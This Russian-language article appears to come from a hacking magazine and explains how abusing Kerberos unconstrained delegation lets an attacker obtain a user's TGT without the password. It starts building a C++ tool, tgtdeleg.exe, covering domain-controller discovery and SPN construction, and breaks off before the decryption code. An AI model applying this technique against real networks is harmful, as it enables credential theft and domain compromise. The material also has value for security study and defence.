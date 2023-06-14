В этой статье мы рас­смот­рим не очень популяр­ную, но край­не инте­рес­ную ата­ку, реали­зовав которую ата­кующий смо­жет получить TGT-билет поль­зовате­ля, даже не зная его пароля либо хеша. Хакеру дос­таточ­но лишь выпол­нить код от лица это­го поль­зовате­ля, а все осталь­ное сде­лает за нас KDC.

Active Directory пре­дос­тавля­ет мощ­ный набор фун­кций для делеги­рова­ния прав на оли­цет­ворение поль­зовате­лей кон­крет­ной служ­бе. Сущес­тву­ет три вида делеги­рова­ния: неог­раничен­ное, огра­ничен­ное и огра­ничен­ное на осно­ве ресур­сов. Про каж­дый уже рас­ска­зыва­лось мно­го раз, но какие еще воз­можнос­ти таит в себе механизм делеги­рова­ния?

Особенности неограниченного делегирования

При неог­раничен­ном делеги­рова­нии адми­нис­тра­тор при­ходит к служ­бе и говорит: «Теперь ты можешь оли­цет­ворять кли­ентов на дру­гих служ­бах». При­чем на абсо­лют­но любых служ­бах (отсю­да и наз­вание — неог­раничен­ное). Как это работа­ет?

Во‑пер­вых, кли­ент обра­щает­ся к служ­бе с неог­раничен­ным делеги­рова­нием. KDC видит, что эта служ­ба име­ет спе­циаль­ный флаг TRUSTED_FOR_DELEGATION (он сиг­нализи­рует о том, что у служ­бы нас­тро­ено неог­раничен­ное делеги­рова­ние), поэто­му воз­вра­щает кли­енту TGS на эту служ­бу, но со спе­циаль­ным фла­гом OK-AS-DELEGATE . Сле­дующим шагом кли­ент про­веря­ет этот самый флаг. Если он видит, что флаг уста­нов­лен, то понима­ет: служ­ба исполь­зует неог­раничен­ное делеги­рова­ние, поэто­му кли­ент вновь идет к KDC и зап­рашива­ет спе­циаль­ный FORWARDED TGT, который будет отправ­лен служ­бе.

Внут­ри это­го тикета будет лежать так­же сес­сион­ный ключ, что поз­волит служ­бе без проб­лем оли­цет­ворять кли­ента. Далее у кли­ента будет TGS-тикет на служ­бу, а так­же этот FORWARDED TGT, поэто­му пора идти к служ­бе. Генери­рует­ся зап­рос AP-REQ, который содер­жит этот самый FORWARDED TGT.

При­чем тикет будет находить­ся внут­ри так называ­емо­го аутен­тифика­тора. Он поз­воля­ет пре­дот­вра­тить воз­можность релей‑ата­ки на этап AP-REQ, так как аутен­тифика­тор зашиф­рован сес­сион­ным клю­чом, а так­же содер­жит (в слу­чае обыч­ного AP-REQ) имя прин­ципала кли­ента и тай­мстемп. Если же служ­ба нас­тро­ена с неог­раничен­ным делеги­рова­нием, то в зап­рос AP-REQ, который отпра­вит­ся служ­бе, попадет не толь­ко тай­мстемп и имя прин­ципала, но и FORWARDED TGT. При­чем этот самый FORWARDED TGT будет лежать внут­ри аутен­тифика­тора. Сес­сион­ный ключ для шиф­рования аутен­тифика­тора кли­ент получа­ет в отве­те TGS-REP, который идет до AP-REQ.

Та­ким обра­зом, у ата­кующе­го появ­ляет­ся воз­можность рас­шифро­вать аутен­тифика­тор из AP-REQ, а затем получить TGT-билет поль­зовате­ля, который ини­цииро­вал обра­щение к служ­бе с неог­раничен­ным делеги­рова­нием, ведь на руках у него будет зашиф­рован­ный блоб и ключ для его дешиф­ровки.

Особенности эксплуатации

Что­бы успешно получить TGT, нуж­но, что­бы выпол­нялись сле­дующие тре­бова­ния:

служ­ба, к которой обра­щает­ся кли­ент, нас­тро­ена на неог­раничен­ное делеги­рова­ние. Но здесь ничего страш­ного нет — все кон­трол­леры домена нас­тро­ены с неог­раничен­ным делеги­рова­нием;

у нас есть воз­можность выпол­нить код от лица кли­ента.

Ито­говый алго­ритм дос­таточ­но прос­той:

Об­раща­емся к служ­бе с неог­раничен­ным делеги­рова­нием. По­луча­ем сге­нери­рован­ный AP-REQ. Из­вле­каем сес­сион­ный ключ для рас­шифров­ки аутен­тифика­тора. Рас­шифро­выва­ем аутен­тифика­тор. Из­вле­каем TGT.

Обнаружение нужной службы

Итак, сна­чала соз­даем файл Header. h , в котором ука­зыва­ем все нуж­ные заголо­воч­ные фай­лы, под­гру­жаемые либы, а так­же про­тотип одной‑единс­твен­ной фун­кции.

#pragma once #define SECURITY_WIN32 #include < windows. h> #include < sspi. h> #include < DsGetDC. h> #include < NTSecAPI. h> #include < iostream> #include < locale. h> #include < wincrypt. h> #include < WinBase. h> #define DEBUG #pragma comment ( lib, "Secur32. lib") #pragma comment ( lib, "NetApi32. lib") #pragma comment( lib, "Crypt32. lib") DWORD TgtDeleg ( LPCWSTR ) ;

Те­перь сто­ит пре­дус­мотреть два вари­анта работы инс­тру­мен­та: в пер­вом слу­чае служ­ба с неог­раничен­ным делеги­рова­нием будет обна­руже­на авто­мати­чес­ки (дос­таточ­но толь­ко име­ни домена), а во вто­ром ата­кующий собс­твен­норуч­но смо­жет ука­зать нуж­ный SPN.

Глав­ная фун­кция инс­тру­мен­та не очень боль­шая. Сна­чала получа­ем спи­сок аргу­мен­тов, при­чем про­веря­ем: если их не три, то ата­кующий ука­зал что‑то не то, поэто­му вызыва­ем фун­кцию, которая рас­ска­жет, как исполь­зовать инс­тру­мент.

int wmain ( char argc , wchar_t * argv [] ) { setlocale ( LC_ALL , "" ) ; ShowAwesomeBanner () ; if ( argc != 3 ) { ShowUsage () ; } ... . } void ShowUsage ( ) { std : : wcout < < L"tgtdeleg. exe 1 < DOMAIN NAME> \ n\ t Ex: tgtdeleg. exe 1 cringe. lab" < < std : : endl ; std : : wcout < < L"tgtdeleg. exe 2 < SPN With Unconstrained Deleg> \ n\ t Ex: tgtdeleg. exe 2 CIFS/ dc01. cringe. lab" < < std : : endl ; exit ( - 1 ) ; }

Ес­ли же поль­зователь ниг­де не напор­тачил, то перехо­дим к пар­сингу аргу­мен­тов. В пер­вом слу­чае, ког­да ука­зыва­ется толь­ко имя домена, вызыва­ется фун­кция GetDomainController( ) .

LPCWSTR targetname = NULL ; switch ( * argv [ 1 ] ) { case '1' : targetname = GetDomainController ( argv [ 2 ]) ; break ; .. .

Эта фун­кция поз­воля­ет получить DNS-имя кон­трол­лера домена. Мы берем кон­трол­лер домена потому, что на нем по умол­чанию вклю­чено неог­раничен­ное делеги­рова­ние. Получить имя мож­но с помощью фун­кции DsGetDcName( ) .

LPCWSTR GetDomainController ( wchar_t * domainName ) { PDOMAIN_CONTROLLER_INFO dcInfo = NULL ; DWORD err = DsGetDcName ( NULL , ( LPCWSTR ) domainName , NULL , NULL , DS_RETURN_DNS_NAME | DS_IP_REQUIRED , & dcInfo ) ; if ( err != ERROR_SUCCESS ) { std : : wcout < < L"[ -] Cant Get DC Name, try use 2 mode: " < < err < < std : : endl ; exit ( - 1 ) ; } return dcInfo -> DomainControllerName ; }

Пос­ле получе­ния име­ни уби­раем из него пер­вые два сим­вола сле­ша (так как фун­кция вер­нула \\ dc01 , а нам нуж­но прос­то dc01 ), а затем добав­ляем к получен­ному име­ни служ­бу CIFS. В ито­ге у нас появ­ляет­ся валид­ный SPN на служ­бу CIFS кон­трол­лера домена.

targetname = removeLeadingCharacters ( targetname ) ; #ifdef DEBUG std : : wcout < < L"[ +] Target: " < < targetname < < std : : endl ; #endif LPCWSTR SPN = addCIFS ( targetname ) ;

Фун­кция removeLeadingCharacters прос­то чуть‑чуть сме­щает ука­затель на получен­ную стро­ку, что­бы пер­вые два сим­вола \ \ как бы про­пали.

LPCWSTR removeLeadingCharacters ( LPCWSTR originalString ) { LPCWSTR stringPtr = originalString ; if ( stringPtr [ 0 ] == L '\ ' & & stringPtr [ 1 ] == L '\ ' ) { stringPtr += 2 ; } return stringPtr ; }

А фун­кция addCIFS( ) добав­ляет стро­ку CIFS/ к име­ни компь­юте­ра.

LPCWSTR addCIFS ( LPCWSTR originalString ) { size_t originalSize = wcslen ( originalString ) ; size_t cifsSize = 5 ; size_t newSize = originalSize + cifsSize + 1 ; LPWSTR newString = new WCHAR [ newSize ] ; wcscpy_s ( newString , newSize , L"CIFS/ " ) ; wcscat_s ( newString , newSize , originalString ) ; return newString ; }

Есть и вто­рой вари­ант — поль­зователь дол­жен самос­тоятель­но ука­зать SPN. Здесь никако­го пар­синга тог­да не пот­ребу­ется. Сра­зу переда­ем получен­ный SPN в фун­кцию TgtDeleg( ) , в которой реали­зова­на логика получе­ния сес­сион­ного клю­ча и бло­ба AP-REQ.

case '2' : if ( TgtDeleg ( argv [ 2 ] ) == 0 ) { std : : wcout < < L"[ +] TgtDeleg Success" < < std : : endl ; return 0 ; } else { std : : wcout < < L"[ -] TgtDeleg Error" < < std : : endl ; return - 1 ; } break ; default : std : : wcout < < L"[ -] No such mode" < < std : : endl ; ShowUsage () ; return 0 ; }

Подключение к службе